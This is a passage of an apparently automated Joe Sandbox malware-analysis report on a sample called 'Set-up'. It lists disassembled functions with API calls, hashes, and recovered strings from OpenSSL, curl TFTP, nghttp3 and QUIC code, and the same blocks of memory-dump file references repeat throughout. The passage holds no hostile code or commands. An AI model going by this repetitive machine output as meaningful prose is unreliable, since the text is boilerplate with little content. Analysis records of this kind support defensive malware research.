                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                • Instruction ID: c52bf2c504138b26b42ed908ba7a4c58f17b406fe10f48980904cd6f44378ea7
                                • Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                • Instruction Fuzzy Hash: EF71E4715082168BD719AF6CE1C4169FBE1BF88300F198F6FD98987342D278ECA5CB45
                                Function 00284170 Relevance: .2, Instructions: 169COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                • Instruction ID: efef31d1435a5fef92f7658ab0d288e74d4dd20d791594c617e0bf2cf3e8501f
                                • Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                • Instruction Fuzzy Hash: AD513939B1A3424BD704BE5C848026EB7D1FBA6324F2947BDD89A8B386C220DC16C781
                                Function 0048A610 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                • Instruction ID: a02bf752c567ac3183c10190017b84b331b3c40d81260d213e980c56b8a8d471
                                • Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                • Instruction Fuzzy Hash: C751B076A086258BD718EF19C1D002DFBE2BB88300F15CA6EDD9967741C374AD64DBC6
                                Function 0049A000 Relevance: .1, Instructions: 122COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                • Instruction ID: 225e67725f9c965f897a2771e5b2d3b1aa07327ba93bc932315aa31f613f3393
                                • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                • Instruction Fuzzy Hash: 8931C4313083194BCF14AD6DC8C422BFAD39BD8350F55863EE589C3380E9758C6986CB
                                Function 003084A0 Relevance: 60.4, APIs: 24, Strings: 16, Instructions: 382stringCOMMON
                                Download Yara Rule
                                APIs
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 003085B6
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 003085CC
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 003085E2
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 003085F8
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 0030860A
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00308620
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00308634
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 0030864A
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 0030865C
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00308672
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 003086A0
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003086BA
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 003086D0
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 003086E2
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 003086FC
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00308712
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 0030872A
                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00308686
                                  • Part of subcall function 002ECBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,002C7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,002C40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002ECBD2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strcmp$free
                                • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
                                • API String ID: 3401341699-4246700284
                                • Opcode ID: be2826a77b382f51fd0109ee3e605fe81c500cbf79b7d07bcf4bb4eff16a3a4d
                                • Instruction ID: c45a6dea8a6ab77caef4038a7b41772fc5767d841746d9f8d1c329896869d5bd
                                • Opcode Fuzzy Hash: be2826a77b382f51fd0109ee3e605fe81c500cbf79b7d07bcf4bb4eff16a3a4d
                                • Instruction Fuzzy Hash: 9DB15AF1A4630627DE127725AC23FAB36881F6179DF48443CF988A02C3FFA9E5158657
                                Function 00182010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0018204A
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00182068
                                • WSAGetLastError.WS2_32 ref: 001820DE
                                • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0018214D
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00182365
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0018238F
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 001823B9
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0018241D
                                • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 001824AD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                                • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                                • API String ID: 3302935713-3407012168
                                • Opcode ID: 5e354658b51150a78df5e8a676383d358c83f99a17022883e398934f5e3b9478
                                • Instruction ID: b88b51c7056b62db36987ee496653175b00bd14d12fc294d2bb56222742646a3
                                • Opcode Fuzzy Hash: 5e354658b51150a78df5e8a676383d358c83f99a17022883e398934f5e3b9478
                                • Instruction Fuzzy Hash: E0E134B5A00301ABD712EB28DC41B7BB7E5FF94704F098529FC4897282E774EA10CB92
                                Function 001BA140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 001BA29A
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 001BA2C5
                                • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 001BA2E3
                                  • Part of subcall function 001BA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 001BA5FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy$memmove
                                • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                                • API String ID: 1283327689-1606465060
                                • Opcode ID: 29135a27ec9015c7782e8dc63f41380f6a805b2da16790f114efbe23eced3186
                                • Instruction ID: 066bf7c5c0e011404fef39d0220b9dbf8f7f75b5d379f1f65a1a176e1135c796
                                • Opcode Fuzzy Hash: 29135a27ec9015c7782e8dc63f41380f6a805b2da16790f114efbe23eced3186
                                • Instruction Fuzzy Hash: 85C1F371600305EFCB14DF18C8859AAB7E5FF88314F98862DF9599B292D770ED84CB82
                                Function 001827E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00182AD7
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00182B3D
                                • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00182D30
                                • WSAGetLastError.WS2_32 ref: 00182D3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$ErrorLastsendto
                                • String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
                                • API String ID: 3285375004-3063461439
                                • Opcode ID: 8e66bcece5930d9186ab076228a8d17f311e9afaa4f722102e9ee8fb076125af
                                • Instruction ID: 53556abeb131a0b1c7a270f8367ac154637b45a4e6e0caa6ed198124ab601050
                                • Opcode Fuzzy Hash: 8e66bcece5930d9186ab076228a8d17f311e9afaa4f722102e9ee8fb076125af
                                • Instruction Fuzzy Hash: CCE12971B00304ABD719FB28CC46FBA7395AF61708F094569FD185B392E772EA14CBA1
                                Function 00134720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON
                                Download Yara Rule
                                APIs
                                • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00134749
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 001348E5
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 0013491B
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134963
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00134971
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0013497B
                                  • Part of subcall function 001306F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00135663,?), ref: 001306F9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134A41
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00134A63
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134A6D
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00134AE0
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134AEA
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00134B28
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134B34
                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00134B76
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00134B80
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$strtoul$strchr$memchrstrlen
                                • String ID: %ld$%u.%u.%u.%u$urlapi.c
                                • API String ID: 102816355-2423153182
                                • Opcode ID: 44118acb66fce03f7bdc2c697080699759db8fab639e840a178fb2b808bad8ea
                                • Instruction ID: 2aa5f644b6bca5af33781ffdadd6d8a9e8322b5e0c7b82dc40217b99b56271fd
                                • Opcode Fuzzy Hash: 44118acb66fce03f7bdc2c697080699759db8fab639e840a178fb2b808bad8ea
                                • Instruction Fuzzy Hash: C9D146B1908341ABEB20AB24DC42B7B7BE49F51315F05443CF88A9B282F739ED54C796
                                Function 0018C350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 0018C37A
                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 0018C476
                                • WSAGetLastError.WS2_32 ref: 0018C4AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLastmemcpystrcpy
                                • String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
                                • API String ID: 31095072-3036451936
                                • Opcode ID: fed33ab2645c624b85bcf2112a5e68f1e4ecf8908caca8ae56e80cb78b917bb9
                                • Instruction ID: 4e6ac435989ca32073affedc80ef5a785f3cd5a59f5ab3d9421ddfff3fcd8d6f
                                • Opcode Fuzzy Hash: fed33ab2645c624b85bcf2112a5e68f1e4ecf8908caca8ae56e80cb78b917bb9
                                • Instruction Fuzzy Hash: 1F5127B1A083489FDB10AA54DC01B7FBB95DF91318F05842DF9889B242D775EA948FA2
                                Function 0039E990 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 242COMMON
                                Download Yara Rule
                                APIs
                                • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0039EA90
                                • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?), ref: 0039EAD9
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0039EB98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
